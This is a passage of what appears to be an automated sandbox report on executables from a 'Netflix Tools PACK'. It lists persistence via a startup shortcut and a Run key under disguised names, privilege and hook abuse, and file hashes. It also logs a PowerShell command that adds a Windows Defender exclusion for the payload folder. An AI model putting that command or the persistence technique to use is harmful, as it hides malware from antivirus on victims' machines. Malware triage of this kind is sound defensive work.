| Key value queried | \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\NetFlix GC Checker by xRisky.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\NetFlix GC Checker by xRisky.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\NetFlix GC Checker by xRisky.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\litedb.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\litedb.exe"
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 93.184.221.240:80 | tcp | |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
memory/3124-133-0x00000000008A0000-0x00000000008B2000-memory.dmp
memory/3124-134-0x0000000005230000-0x00000000052CC000-memory.dmp
memory/3124-135-0x0000000005880000-0x0000000005E24000-memory.dmp
memory/3124-136-0x0000000005370000-0x0000000005402000-memory.dmp
memory/3124-137-0x0000000005310000-0x000000000531A000-memory.dmp
memory/3124-138-0x00000000055A0000-0x00000000055F6000-memory.dmp
memory/3124-139-0x0000000005590000-0x00000000055A0000-memory.dmp
memory/4852-140-0x0000000000670000-0x0000000000684000-memory.dmp
memory/4852-141-0x0000000004F30000-0x0000000004F40000-memory.dmp
memory/4852-142-0x00000000065A0000-0x000000000661E000-memory.dmp
memory/5012-144-0x0000000002A60000-0x0000000002A96000-memory.dmp
memory/5012-145-0x0000000005500000-0x0000000005B28000-memory.dmp
memory/5012-146-0x0000000002AD0000-0x0000000002AE0000-memory.dmp
memory/4852-147-0x0000000004F30000-0x0000000004F40000-memory.dmp
memory/5012-148-0x00000000054D0000-0x00000000054F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2xzk4kca.04g.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5012-151-0x0000000005CA0000-0x0000000005D06000-memory.dmp
memory/5012-159-0x0000000005E80000-0x0000000005EE6000-memory.dmp
memory/5012-160-0x0000000006370000-0x000000000638E000-memory.dmp
memory/4724-161-0x0000000004DF0000-0x0000000004E00000-memory.dmp
memory/4724-162-0x0000000004DF0000-0x0000000004E00000-memory.dmp
memory/4724-163-0x0000000004DF0000-0x0000000004E00000-memory.dmp
memory/4724-164-0x0000000004DF0000-0x0000000004E00000-memory.dmp
memory/4724-165-0x0000000002760000-0x0000000002784000-memory.dmp
memory/4724-166-0x0000000008640000-0x0000000008694000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/4852-188-0x00000000062E0000-0x0000000006356000-memory.dmp
memory/4852-189-0x00000000062C0000-0x00000000062DE000-memory.dmp
memory/4724-201-0x0000000004DF0000-0x0000000004E00000-memory.dmp
memory/5012-202-0x0000000006940000-0x0000000006972000-memory.dmp
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/5012-207-0x000000006F460000-0x000000006F4AC000-memory.dmp
memory/5012-218-0x0000000006920000-0x000000000693E000-memory.dmp
memory/5012-208-0x000000007F830000-0x000000007F840000-memory.dmp
memory/1964-219-0x0000000000400000-0x0000000000412000-memory.dmp
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/5012-206-0x0000000002AD0000-0x0000000002AE0000-memory.dmp
memory/5012-220-0x0000000007CC0000-0x000000000833A000-memory.dmp
memory/5012-221-0x0000000007680000-0x000000000769A000-memory.dmp
memory/1964-222-0x0000000004CE0000-0x0000000004CF0000-memory.dmp
memory/5012-223-0x0000000007700000-0x000000000770A000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
memory/3716-229-0x0000000000E80000-0x0000000000E92000-memory.dmp
memory/5012-228-0x0000000007910000-0x00000000079A6000-memory.dmp
memory/5012-232-0x00000000078C0000-0x00000000078CE000-memory.dmp
memory/5012-233-0x00000000079D0000-0x00000000079EA000-memory.dmp
memory/5012-234-0x00000000079B0000-0x00000000079B8000-memory.dmp
memory/3716-235-0x00000000055D0000-0x00000000055E0000-memory.dmp
memory/4724-238-0x0000000000400000-0x0000000000671000-memory.dmp
memory/4724-239-0x0000000004DF0000-0x0000000004E00000-memory.dmp
memory/4724-240-0x0000000004DF0000-0x0000000004E00000-memory.dmp
memory/4724-241-0x0000000004DF0000-0x0000000004E00000-memory.dmp
memory/4724-242-0x0000000004DF0000-0x0000000004E00000-memory.dmp
memory/4724-243-0x0000000004DF0000-0x0000000004E00000-memory.dmp
memory/1964-244-0x0000000004CE0000-0x0000000004CF0000-memory.dmp
memory/3716-245-0x00000000055D0000-0x00000000055E0000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:59
Platform
win10v2004-20230621-en
Max time kernel
39s
Max time network
45s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\Launcher.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 20.189.173.13:443 | tcp |
Files
memory/4692-133-0x00000000001E0000-0x00000000001F4000-memory.dmp
memory/4692-134-0x0000000004F90000-0x0000000005534000-memory.dmp
memory/4692-135-0x0000000004AC0000-0x0000000004B52000-memory.dmp
memory/4692-136-0x0000000004D80000-0x0000000004D8A000-memory.dmp
memory/4692-137-0x00000000023C0000-0x00000000023D0000-memory.dmp
memory/4692-138-0x0000000006230000-0x00000000062AE000-memory.dmp
memory/4692-139-0x00000000023C0000-0x00000000023D0000-memory.dmp
memory/4720-140-0x00000000050E0000-0x0000000005116000-memory.dmp
memory/4720-141-0x0000000005900000-0x0000000005F28000-memory.dmp
memory/4720-142-0x00000000052C0000-0x00000000052D0000-memory.dmp
memory/4720-143-0x00000000052C0000-0x00000000052D0000-memory.dmp
memory/4720-144-0x00000000057D0000-0x00000000057F2000-memory.dmp
memory/4720-145-0x0000000005880000-0x00000000058E6000-memory.dmp
memory/4720-151-0x0000000006020000-0x0000000006086000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vy0agduf.zhv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/4720-170-0x0000000006690000-0x00000000066AE000-memory.dmp
memory/4692-178-0x0000000005E10000-0x0000000005E86000-memory.dmp
memory/4692-179-0x0000000005DF0000-0x0000000005E0E000-memory.dmp
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/3924-194-0x0000000000C90000-0x0000000000CA2000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
memory/3924-195-0x0000000005680000-0x0000000005690000-memory.dmp
memory/4720-197-0x00000000052C0000-0x00000000052D0000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/4540-201-0x0000000000010000-0x0000000000022000-memory.dmp
memory/4540-203-0x0000000004970000-0x0000000004980000-memory.dmp
memory/4720-205-0x0000000007640000-0x0000000007672000-memory.dmp
memory/4720-206-0x00000000700C0000-0x000000007010C000-memory.dmp
memory/4720-216-0x0000000006C50000-0x0000000006C6E000-memory.dmp
memory/4720-217-0x000000007F990000-0x000000007F9A0000-memory.dmp
memory/4720-218-0x0000000007FF0000-0x000000000866A000-memory.dmp
memory/4720-219-0x00000000079A0000-0x00000000079BA000-memory.dmp
memory/4720-220-0x0000000007A10000-0x0000000007A1A000-memory.dmp
memory/4720-221-0x0000000007C20000-0x0000000007CB6000-memory.dmp
memory/4720-222-0x0000000007BD0000-0x0000000007BDE000-memory.dmp
memory/4720-223-0x0000000007CE0000-0x0000000007CFA000-memory.dmp
memory/4720-224-0x0000000007CC0000-0x0000000007CC8000-memory.dmp
memory/3924-227-0x0000000005680000-0x0000000005690000-memory.dmp
memory/4540-228-0x0000000004970000-0x0000000004980000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
17s
Max time network
22s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\NetCheck.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\NetCheck.exe"
Network
Files
memory/5048-133-0x0000000000FE0000-0x000000000161C000-memory.dmp
memory/5048-134-0x0000000005F20000-0x0000000005F40000-memory.dmp
memory/5048-135-0x0000000006360000-0x00000000063B4000-memory.dmp
memory/5048-136-0x0000000006970000-0x0000000006F14000-memory.dmp
memory/5048-137-0x0000000006460000-0x00000000064F2000-memory.dmp
memory/5048-138-0x0000000007450000-0x000000000797C000-memory.dmp
memory/5048-139-0x0000000006620000-0x00000000066BC000-memory.dmp
memory/5048-140-0x00000000063D0000-0x00000000063DA000-memory.dmp
memory/5048-141-0x0000000006F20000-0x0000000006F76000-memory.dmp
memory/5048-142-0x0000000007110000-0x0000000007120000-memory.dmp
memory/5048-143-0x0000000007110000-0x0000000007120000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
32s
Max time network
29s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.125.24.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.121.18.2.in-addr.arpa | udp |
Files
memory/4848-133-0x0000000000780000-0x0000000000794000-memory.dmp
memory/4848-134-0x00000000057F0000-0x0000000005D94000-memory.dmp
memory/4848-135-0x0000000005160000-0x00000000051F2000-memory.dmp
memory/4848-136-0x0000000005150000-0x000000000515A000-memory.dmp
memory/4848-137-0x0000000005230000-0x0000000005240000-memory.dmp
memory/4848-138-0x0000000006890000-0x000000000690E000-memory.dmp
memory/4848-139-0x0000000005230000-0x0000000005240000-memory.dmp
